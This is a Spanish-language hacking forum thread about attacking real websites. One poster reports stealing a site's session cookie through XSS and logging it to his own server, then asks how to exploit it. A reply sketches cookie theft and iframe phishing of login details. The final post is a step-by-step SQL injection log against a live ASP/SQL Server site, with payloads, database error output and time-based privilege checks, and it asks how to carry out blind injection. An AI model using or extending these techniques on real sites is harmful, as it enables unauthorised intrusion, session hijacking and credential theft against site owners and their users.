Mensajes

[mucho]

y si lee/estudia mucho primero y dsp volve ! 

saludos

¿De que te sirve usar una herramienta sin saber que operación realiza?

Saludos.

Se nota que no tienes idea de lo que estas hablando, ni sabes lo que es una Blind-SQL, ni el porque del uso de scripts.

[ERRORES]

Como va a andar en windows  !? bajencen el ActivePerl si lo quieren ejecutar en win, en la mayoria d los linux viene nativo sino.

Con respecto al tutorial es bueno y entendible, lo unico malo son los ERRORES de ortografia q tiene, los cuales le sacan toda la seriedad; para la proxima q se haga un script auto-corrector xDDD

Para el SQL-blind recomiendo el SQLninja es genial !

y como puedo hacer eso ?

ya probe la cookie y parece no darme admin, pero quiza se entre al panel desde una direccion especial y ahi sea "usable" la cookie, realmente la programacion de la pagina es muy pobre ..

uso $_GET['null']; REMOTE_ADDR; HTTP_USER_AGENT y HTTP_REFERER .. para obtener datos, como podria saber las paginas a las q entro el admin ?

desde ya muchas gracias ..

Descubri un XSS de un sitio, robe la cookie mediante JS, hice un script en php para almacenar los datos en uno de mis servers ..

ip: 200.***.***.***

browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

ref: http://www.******.com/***.php?id=*****

date: 19/03/2008

hour: 20:54:30

cookie: PHPSESSID=43p42cd42a51fe827de338042fe7d2a9

Se puede hacer algo con el PHPSESSID o nada ? estuve buscando mucho antes de postear pero no vi nadie q sepa realmente q hacer, mucha teoria y poca practica ...

El sitio no utiliza cookies ni phpsessid para los usuarios ni nada, esto cookie creo q la saque de la pc admin del site, no estoy seguro igual, ustedes diran ..

gracias

el mio jejej por joder ...

una pregunta ... que ventajas puedo obtener para mi ?
por que hasta ahora solo vi cosas nomas nunca una web hackeada con eso

Puedes modificar la URL, de tal modo que parezca no modificada, esto puedes hacerlo usando "Hexadecimal Characters Code" o etc.

Luego si el sitio usa session cookies, puedes robarselas a tu "victima" mediante un simple script en PHP y JS o lo q sea que quieras usar que te sirva para el proposito que tengas.

Otro ataque seria mediante ingenieria social, mandar la URL a una "victima" la cual se encuentre con un Iframe (o lo que sea) q concuerde con el diseño de la web, la cual le haga un prompt de User/Password, con poco conocimiento de html/php lo puedes hacer muy facil.

Como ves las opciones son muchas .. solo tienes que imaginarlas.

Hola a ver si alguien me puede ayudar con esto 

Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido

la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm

##############
# Inserting a tick #
##############

id='

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


#########################
# Identify a valid page #
#########################

id=10

Returns a valid page


################################
# Insert tick after valid page #
################################

id=10'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


###############################
# Tried to enum db table/column name #
###############################

Attempt with the tick

id=10' having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Attempt without the tick

Returns the following error:

id=10 having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'.

/lib/class/ListaProducto.asp, line 54



##################################
# Tried the AND 1=1-- and the OR 1=1-- #
##################################

Trying the AND 1=1--

id=10 AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'.

/lib/class/ListaProducto.asp, line 54



Trying the OR 1=1--

id=10 or 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'.

/lib/class/ListaProducto.asp, line 54


Then tried them with the ticks

id=10' AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54

id=10' OR 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Trying to determine if the DB is running as SA
id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--

Returned page immediately so we know it's NOT running as SA



Trying to determine if it is a member of the SysAdmin group
id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--

Returned page immediately so we know it's NOT a member of the SysAdmin group


**

Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ?

desde ya muchas gracias ..